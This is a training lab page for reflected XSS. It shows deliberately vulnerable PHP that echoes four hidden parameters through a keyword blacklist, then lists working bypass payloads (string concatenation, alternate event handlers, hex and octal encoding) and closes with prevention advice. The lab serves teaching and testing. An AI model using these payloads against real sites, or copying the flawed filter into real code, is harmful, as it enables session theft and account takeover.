Multiple Parameter Blacklist Filter XSS Lab

Test XSS with consistent blacklist filtering across multiple hidden parameters

Multiple Parameter Challenge

Lab Overview

This lab demonstrates a consistent blacklist filtering approach applied to multiple hidden parameters. The 'id', 'cat', 'page', and 'number' parameters all use the same blacklist filter, making this a comprehensive test of bypass techniques.

Consistent Blacklist Filtering: All hidden parameters (id, cat, page, number) use the same str_replace() filter to remove specific dangerous keywords.
Multiple Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them all!
# use arjun tool to find hidden parameters: id, cat, page, number
Parameter Security Levels:
Secure fname, lname - Uses htmlspecialchars()
Filtered id, cat, page, number - Same blacklist filter
Consistent Filtering Same filter applied to all hidden parameters
Multiple Vectors Multiple parameters to test bypass techniques
Blacklist Filter Details:

All filtered parameters remove these keywords:

details alert confirm prompt eval ontoggle
Parameter: id
Filtered with blacklist
Parameter: cat
Filtered with blacklist
Parameter: page
Filtered with blacklist
Parameter: number
Filtered with blacklist
Secure Parameters (fname, lname):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Blacklist Filtered (id, cat, page, number):
Input: <details ontoggle=alert(1)>
Output: < ontoggle=()>
The same blacklist filter is consistently applied to all hidden parameters, making it a good test case for bypass techniques.
Overall Security Level: Medium Vulnerability

Objective: Discover all hidden parameters and find ways to bypass the consistent blacklist filtering to execute XSS payloads.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle');
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
elseif(isset($_GET["cat"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle');
    $re = str_replace($arr, '', $_GET['cat']);
    echo $re;
}
elseif(isset($_GET["page"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle');
    $re = str_replace($arr, '', $_GET['page']);
    echo $re;
}
elseif(isset($_GET["number"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle');
    $re = str_replace($arr, '', $_GET['number']);
    echo $re;
}
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters (Blacklist Filtered)
Hint: Multiple parameters (id, cat, page, number) are hidden but implemented with the same blacklist filtering.
Uses blacklist filtering - removes specific keywords
Uses same blacklist filtering as id parameter
Uses same blacklist filtering as other parameters
Uses same blacklist filtering as other parameters
XSS Bypass Techniques for This Blacklist
Alternative Tags/Events (Not Filtered):
  • <script>window['al'+'ert'](1)</script>
  • <img src=x onerror=window['al'+'ert'](1)>
  • <body onload=window['al'+'ert'](1)>
  • <svg onload=window['al'+'ert'](1)>
JavaScript String Concatenation:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
Alternative Functions (Not Filtered):
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>setTimeout('al'+'ert(1)')</script>
Encoding Bypass Techniques:
  • <script>window['alert'](1)</script> (HTML entities)
  • <script>window['\x61lert'](1)</script> (Hex encoding)
  • <script>window['\141lert'](1)</script> (Octal encoding)
  • <script>window[`al${''}ert`](1)</script> (Template literals)
Blacklist Filter Analysis:

The current filter removes these exact strings: 'details', 'alert', 'confirm', 'prompt', 'eval', 'ontoggle'

This means these techniques can bypass the filter:

  • Using string concatenation to build blocked function names
  • Using alternative functions that aren't in the blacklist
  • Using character encoding (HTML entities, hex, octal)
  • Using template literals or other string manipulation
  • Using global objects (window, self, this, top) to access functions
Filter Limitations:
  • Doesn't prevent string concatenation
  • Doesn't handle encoding variations
  • Doesn't block alternative functions
  • Doesn't prevent access via global objects
Security Implications

Multiple parameter filtering demonstrates:

  • Consistent filtering across parameters is good practice
  • Blacklists are still vulnerable to creative bypasses
  • Multiple parameters provide multiple attack vectors
  • String manipulation can easily bypass keyword filters
  • Global objects provide multiple ways to access functions
  • Whitelist approaches are more secure than blacklists
Best Practices

For secure web applications:

  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types
  • Use security libraries/frameworks for output encoding
  • Test all parameters with various bypass techniques
  • Apply consistent security controls across all parameters
  • Assume blacklists will be bypassed with enough effort
Real-World Security Implications
Common Multi-Parameter Vectors:
  • Search and filter parameters: Often multiple parameters with similar filtering
  • Pagination parameters: page, limit, offset often have inconsistent validation
  • API endpoints: Multiple query parameters with varying security
  • Form parameters: Various fields may share similar but insufficient filtering
Impact of Multi-Parameter Bypass:
  • Multiple entry points for XSS attacks
  • Increased attack surface
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Complete application compromise
Advanced Prevention Strategies:
  • Context-aware encoding: Use proper encoding for each output context
  • Input validation: Validate based on expected data types and patterns
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with automated and manual techniques
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement X-XSS-Protection, X-Content-Type-Options